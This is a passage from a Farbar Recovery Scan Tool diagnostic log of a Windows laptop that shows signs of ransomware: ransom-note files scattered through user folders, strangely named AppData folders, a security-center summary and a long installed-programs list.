2014-10-16 14:53 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-16 14:53 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-16 14:53 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-12 22:12 - 2014-10-16 16:16 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Lekuaxuc
2014-10-12 22:12 - 2014-10-16 16:13 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Isaholy
2014-10-12 22:11 - 2014-10-12 22:11 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-07 21:57 - 2014-10-07 21:57 - 00008224 _____ () C:\Users\jalockma\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:57 - 2014-10-07 21:57 - 00004156 _____ () C:\Users\jalockma\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:57 - 2014-10-07 21:57 - 00000276 _____ () C:\Users\jalockma\DECRYPT_INSTRUCTION.URL
2014-10-07 21:33 - 2014-10-07 21:33 - 00008224 _____ () C:\Users\jalockma\Downloads\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:33 - 2014-10-07 21:33 - 00008224 _____ () C:\Users\jalockma\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:33 - 2014-10-07 21:33 - 00004156 _____ () C:\Users\jalockma\Downloads\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:33 - 2014-10-07 21:33 - 00004156 _____ () C:\Users\jalockma\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:33 - 2014-10-07 21:33 - 00000276 _____ () C:\Users\jalockma\Downloads\DECRYPT_INSTRUCTION.URL
2014-10-07 21:33 - 2014-10-07 21:33 - 00000276 _____ () C:\Users\jalockma\Documents\DECRYPT_INSTRUCTION.URL
2014-10-07 21:29 - 2014-10-07 21:29 - 00008224 _____ () C:\Users\jalockma\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:29 - 2014-10-07 21:29 - 00008224 _____ () C:\Users\jalockma\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:29 - 2014-10-07 21:29 - 00008224 _____ () C:\Users\jalockma\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:29 - 2014-10-07 21:29 - 00004156 _____ () C:\Users\jalockma\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:29 - 2014-10-07 21:29 - 00004156 _____ () C:\Users\jalockma\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:29 - 2014-10-07 21:29 - 00004156 _____ () C:\Users\jalockma\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:29 - 2014-10-07 21:29 - 00000276 _____ () C:\Users\jalockma\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-10-07 21:29 - 2014-10-07 21:29 - 00000276 _____ () C:\Users\jalockma\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-10-07 21:29 - 2014-10-07 21:29 - 00000276 _____ () C:\Users\jalockma\AppData\DECRYPT_INSTRUCTION.URL
2014-10-07 21:26 - 2014-10-07 21:26 - 00008224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-07 21:26 - 2014-10-07 21:26 - 00004156 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-07 21:26 - 2014-10-07 21:26 - 00000276 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-25 18:14 - 2014-10-07 21:30 - 00000000 ____D () C:\Users\jalockma\Documents\Gardening and Growing
2014-09-25 18:12 - 2014-10-07 21:29 - 00000000 ____D () C:\Users\jalockma\Documents\Bishop McCarthy
2014-09-25 18:08 - 2014-10-07 21:33 - 00000000 ____D () C:\Users\jalockma\Documents\NJ FamilyCare Info

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-17 10:26 - 2014-04-08 21:26 - 00000941 _____ () C:\Windows\Tasks\EPSON XP-310 Series Update {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job
2014-10-17 10:26 - 2014-04-08 21:26 - 00000755 _____ () C:\Windows\Tasks\EPSON XP-310 Series Invitation {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job
2014-10-17 10:00 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\sru
2014-10-17 08:28 - 2013-04-02 06:02 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2604008792-1424924497-987845697-1001
2014-10-17 07:56 - 2012-12-20 06:30 - 00001848 _____ () C:\Users\Public\Desktop\McAfee Internet Security Suite.lnk
2014-10-17 07:55 - 2013-01-26 09:56 - 01244872 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 07:48 - 2013-05-06 14:38 - 00000000 ____D () C:\Users\jalockma\AppData\Local\CrashDumps
2014-10-16 22:28 - 2012-12-20 05:31 - 00098780 _____ () C:\Windows\PFRO.log
2014-10-16 22:28 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\PLA
2014-10-16 22:28 - 2012-07-26 03:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-16 22:28 - 2012-07-26 01:26 - 00524288 ___SH () C:\Windows\system32\config\BBI
2014-10-16 20:36 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\rescache
2014-10-16 17:43 - 2013-04-05 11:43 - 00001607 _____ () C:\Users\jalockma\Desktop\ACERLAPTOP - Shortcut.lnk
2014-10-16 17:27 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-16 16:16 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\schemas
2014-10-16 15:31 - 2012-12-20 06:28 - 00000000 ____D () C:\Program Files (x86)\McAfee
2014-10-16 15:31 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2014-10-16 15:19 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\Performance
2014-10-16 15:17 - 2012-07-25 22:16 - 00000000 __SHD () C:\Users\jalockma\AppData\Roaming\chwhhwdd
2014-10-16 14:54 - 2012-07-26 03:28 - 00848230 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-16 14:53 - 2012-07-26 03:21 - 00028847 _____ () C:\Windows\setupact.log
2014-10-12 21:55 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-12 12:43 - 2014-01-13 15:03 - 00007602 _____ () C:\Users\jalockma\AppData\Local\resmon.resmoncfg
2014-10-08 13:30 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\AUInstallAgent
2014-10-08 13:29 - 2013-04-02 05:55 - 00000000 ____D () C:\Users\jalockma\AppData\Local\Packages
2014-10-08 13:28 - 2013-04-02 09:11 - 00000000 ____D () C:\Users\jalockma\AppData\Local\clear.fi
2014-10-07 21:57 - 2013-04-02 05:55 - 00000000 ____D () C:\Users\jalockma
2014-10-07 21:33 - 2014-04-30 13:40 - 00000000 ____D () C:\Users\jalockma\Documents\Recipes
2014-10-07 21:33 - 2013-12-01 11:21 - 00000000 ____D () C:\Users\jalockma\Documents\NJ Unemployment Claim
2014-10-07 21:33 - 2013-09-17 15:06 - 00000000 ____D () C:\Users\jalockma\Documents\Obamacare Info
2014-10-07 21:33 - 2013-04-12 11:10 - 00000000 ____D () C:\Users\jalockma\Documents\PA Unemployment Claim
2014-10-07 21:33 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\Phonebook
2014-10-07 21:33 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\Performance Objectives and Committments
2014-10-07 21:32 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\My Stuff
2014-10-07 21:32 - 2013-04-11 22:56 - 00000000 ____D () C:\Users\jalockma\Documents\Lockheed
2014-10-07 21:31 - 2014-06-12 17:27 - 00000000 ____D () C:\Users\jalockma\Documents\Jokes
2014-10-07 21:31 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Keepers
2014-10-07 21:31 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Jobs
2014-10-07 21:31 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Investing
2014-10-07 21:30 - 2013-05-17 19:54 - 00000000 ____D () C:\Users\jalockma\Documents\ED2Go Course Plants for Fun N Profit
2014-10-07 21:30 - 2013-04-11 22:54 - 00000000 ____D () C:\Users\jalockma\Documents\Income Taxes
2014-10-07 21:29 - 2013-09-17 15:10 - 00000000 ____D () C:\Users\jalockma\Documents\Computer Info
2014-10-07 21:29 - 2013-06-06 11:12 - 00000000 ____D () C:\Users\jalockma\Documents\COBRA Conexis
2014-10-07 21:29 - 2013-04-02 05:56 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Adobe
2014-10-07 21:26 - 2013-04-09 00:05 - 00000000 ____D () C:\ProgramData\PopCap Games
2014-10-07 21:26 - 2013-01-26 10:30 - 00000000 ____D () C:\ProgramData\Symantec
2014-10-06 14:00 - 2013-05-16 14:21 - 00000000 ____D () C:\Users\jalockma\AppData\Roaming\Spotify
2014-10-06 13:28 - 2012-12-20 06:25 - 00000000 ____D () C:\ProgramData\WildTangent
2014-10-06 13:28 - 2012-12-20 06:25 - 00000000 ____D () C:\Program Files (x86)\WildGames
2014-09-25 18:28 - 2013-04-02 20:45 - 00000000 ____D () C:\Users\jalockma\Documents\Bluetooth Folder

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-06 12:51

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by jalockma at 2014-10-17 11:21:13
Running from C:\Users\jalockma\Desktop\Jbrown Recovery
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

clear.fi SDK - Video 2 (x32 Version: 2.1.2128 - CyberLink Corp.)
Hidden clear.fi SDK- Movie 2 (x32 Version: 2.1.2112 - CyberLink Corp.) Hidden Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation) Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3011 - Acer Incorporated) Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated) Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3011 - Acer Incorporated) Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3012 - Acer Incorporated) AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3125 - Acer Incorporated) AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3204 - Acer Incorporated) Adobe Reader XI (11.0.05) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.05 - Adobe Systems Incorporated) Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.) Ask Toolbar (HKLM-x32\...\{4F524A2D-5637-006A-76A7-A758B70C1101}) (Version: 12.17.1.75 - APN, LLC) <==== ATTENTION Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden Bejeweled 2 Deluxe (HKLM-x32\...\Bejeweled 2 Deluxe) (Version: - PopCap Games) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3112 - Acer Incorporated) clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3109 - Acer Incorporated) CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3318_45364 - CyberLink Corp.) CyberLink MediaEspresso 6.5 (x32 Version: 6.5.3318_45364 - CyberLink Corp.) 
Hidden Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{2433A103-9EC3-49EA-9AD1-58A35F27EE56}) (Version: - Microsoft) Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.16 - Dolby Laboratories Inc) eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM) EPSON Connect version 1.0 (HKLM-x32\...\EPSON Connect_is1) (Version: 1.0 - Epson America Inc.) Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.6.3.0 - SEIKO EPSON CORPORATION) Epson Event Manager (HKLM-x32\...\{2970697F-2A11-4588-8B7F-97322D1CCF3C}) (Version: 3.10.0017 - Seiko Epson Corporation) Epson E-Web Print (HKLM-x32\...\{CEC98C2A-9ED5-49DA-9F3A-92434E0A4FA3}) (Version: 1.19.0000 - SEIKO EPSON CORPORATION) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation) EPSON XP-310 Series Printer Uninstall (HKLM\...\EPSON XP-310 Series) (Version: - SEIKO EPSON Corporation) EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION) ETDWare PS/2-X64 11.6.16.003_WHQL (HKLM\...\Elantech) (Version: 11.6.16.003 - ELAN Microelectronic Corp.) 
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated) Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation) Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2867 - Intel Corporation) Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.4.1001 - Intel Corporation) Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation) Intel® Trusted Connect Service Client (Version: 1.24.388.1 - Intel Corporation) Hidden Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.510 - Oracle) Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.10 - Acer Inc.) Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3006 - Acer Incorporated) LTCM Client (HKLM-x32\...\{B38E9B55-7136-4E66-A084-320512FF3F6F}) (Version: 1.20.3792 - Leader Technologies Inc) Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) McAfee Internet Security Suite (HKLM-x32\...\MSC) (Version: 12.8.988 - McAfee, Inc.) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.) McAfee SiteAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.143 - McAfee, Inc.) 
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft) Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version: - Microsoft) Hidden Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.6029.1000 - Microsoft Corporation) Microsoft Office Professional Plus 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Publisher MUI (English) 
2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) 
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2005 Tools for Office Runtime (x32 Version: 8.0.60940.0 - Microsoft Corporation) Hidden MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.) MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.2.3.51r - Symantec Corporation) Norton Online Backup ARA (x32 Version: 4.1.0.14 - Symantec Corporation) Hidden NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9014 - NTI Corporation) NTI Media Maker 9 (x32 Version: 9.0.2.9014 - NTI Corporation) Hidden Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3202 - Acer) Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.220 - Qualcomm Atheros Communications) Qualcomm Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.7 - Qualcomm Atheros Communications Inc.) Qualcomm Atheros WLAN and Bluetooth Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.41 - Qualcomm Atheros) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6695 - Realtek Semiconductor Corp.) 
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.28124 - Realtek Semiconductor Corp.) Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden Software Updater (HKLM-x32\...\{C09D747A-BD47-42A9-915E-CEB6B1BB7C11}) (Version: 4.2.7 - SEIKO EPSON CORPORATION) Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2810071) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{001E8BF3-EDC3-4D5E-9C11-1D0E599B6497}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2810071) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{001E8BF3-EDC3-4D5E-9C11-1D0E599B6497}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553157) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{97C39B81-3054-4AB4-B11D-A656DE619982}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{48E1B6C2-7299-4F3F-AA63-42F0ACE55AA4}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{18B3CF2A-73F7-4716-B1AE-86D68726D408}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2553310) 
32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589370) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{150A0FF0-AF69-4132-BD93-1E34F63FC8A3}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{C4F26A9B-B121-4135-8084-A0D9C780C7C8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{460FF681-BC66-4C38-99DF-7012E03F1EBA}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{C633216E-FF30-45B6-B2AB-21922A9353EF}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2687503) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{B1FA5E8C-2342-45AF-8A62-5E860042F8DF}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition 
(HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760758) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{24BD08F8-FF6E-4DD8-BE49-3659AE78A819}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2767886) 32-Bit Edition 